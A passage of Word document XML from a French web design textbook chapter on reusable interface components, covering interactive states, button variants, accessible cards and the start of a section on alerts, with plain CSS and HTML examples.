          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Boutons, cartes, alertes, navigation : les briques réutilisables d'une interface cohérente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Intermédiaire · Prérequis : chapitre 14</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Concevoir des composants réutilisables et documentés.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Gérer tous les états d'un composant interactif.</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Distinguer les composants par leur rôle et non par leur apparence.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Construire des alertes et messages compréhensibles par tous.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Organiser une bibliothèque de composants cohérente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.1 Qu'est-ce qu'un composant ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un composant est un ensemble autonome : une structure HTML, des styles et un comportement, réutilisables dans plusieurs contextes. Une carte d'article, un bouton, un champ de formulaire, une alerte sont des composants. Une </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;div&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> colorée n'en est pas un.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2730500"/>
            <wp:docPr id="24" name="Picture 24"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f22.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.22 — Anatomie d'un composant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un composant se définit par son </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>rôle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, pas par son apparence. Le même bouton peut être plein, contouré ou discret : ce sont des variantes, pas des composants différents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.2 Les états d'un élément interactif</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un composant interactif connaît au moins cinq états. Les oublier rend l'interface incomplète, souvent pour les utilisateurs les moins favorisés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.50 — Sept états et leur déclencheur</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08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État</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Déclencheur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Traitement CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Normal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3814"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Repos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Couleur de base</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>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Survol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Souris au-dessus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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:hover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Focus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3814"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sélection au clavier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:focus-visible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>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Actif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Appui en cours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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:active</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Désactivé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3814"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Action indisponible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>:disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>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Chargement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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Traitement en cours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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aria-busy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3814"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Validation échouée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>aria-invalid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un bouton complet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.bouton {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: inline-flex; align-items: center; gap: .45rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: .7rem 1.2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 0; border-radius: 8px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: var(--primaire-700); color: #fff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font: inherit; font-weight: 600;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cursor: pointer;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  transition: background-color .18s ease, transform .18s ease;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.bouton:hover { background: var(--primaire-500); }</w:t>
        <w:br/>
        <w:t>.bouton:active { transform: translateY(1px); }</w:t>
        <w:br/>
        <w:t>.bouton:focus-visible { outline: 3px solid var(--accent); outline-offset: 3px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>.bouton[disabled] { opacity: .55; cursor: not-allowed; }</w:t>
        <w:br/>
        <w:t>.bouton[aria-busy="true"] { cursor: progress; }</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UN BOUTON DÉSACTIVÉ N'EXPLIQUE RIEN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Préférez un bouton actif qui affiche un message d'erreur au clic, ou un texte expliquant pourquoi l'action est indisponible. Un bouton grisé sans explication laisse l'utilisateur sans recours.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.3 Variantes et modificateurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une variante change une caractéristique d'un composant existant. Elle se nomme par son intention : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--principal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--discret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--danger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre variantes, aucune duplication de structure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.bouton--discret {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: transparent;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: var(--primaire-700);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 1px solid var(--neutre-300);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.bouton--danger { background: var(--alerte); }</w:t>
        <w:br/>
        <w:t>.bouton--petit { padding: .4rem .8rem; font-size: .875rem; }</w:t>
        <w:br/>
        <w:t>.bouton--large { width: 100%; justify-content: center; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les tailles se combinent avec les variantes : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.bouton.bouton--danger.bouton--petit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reste cohérent parce que chaque classe ne touche qu'une dimension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.4 Cartes et contenu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une carte regroupe un contenu autonome : article, produit, événement. Elle doit rester compréhensible hors contexte et ne pas dépendre d'une image pour être identifiée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une carte dont le titre porte le lien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&lt;article class="carte"&gt;</w:t>
        <w:br/>
        <w:t>&lt;img class="carte__image" src="images/atelier.webp" alt="" width="800"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    height="450"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;div class="carte__corps"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;p class="carte__etiquette"&gt;Atelier&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;h2 class="carte__titre"&gt;&lt;a href="/ateliers/html"&gt;HTML accessible&lt;/a&gt;&lt;/h2&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;p class="carte__resume"&gt;Structurer une page pour tous les lecteurs.&lt;/p&gt;</w:t>
        <w:br/>
        <w:t>&lt;p class="carte__meta"&gt;&lt;time datetime="2026-11-12"&gt;12 novembre&lt;/time&gt; · 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">      h&lt;/p&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
        <w:br/>
        <w:t>&lt;/article&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le lien est posé sur le titre, non sur toute la carte : cela donne un nom explicite au lien et permet de sélectionner le texte. Si vous rendez la carte entièrement cliquable, utilisez un pseudo-élément qui étend la zone sans masquer le contenu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Étendre la zone cliquable sans masquer le texte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.carte { position: relative; }</w:t>
        <w:br/>
        <w:t>.carte__titre a::after {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  content: "";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: absolute;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  inset: 0;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'image est décorative dans cet exemple : elle est déjà décrite par le titre, d'où l'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vide. Si elle apporte une information, elle doit être décrite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.5 Alertes et messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une alerte communique un état du système : succès, information, avertissement, erreur. Elle doit être annoncée par les lecteurs d'écran et rester visible sans être envahissante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
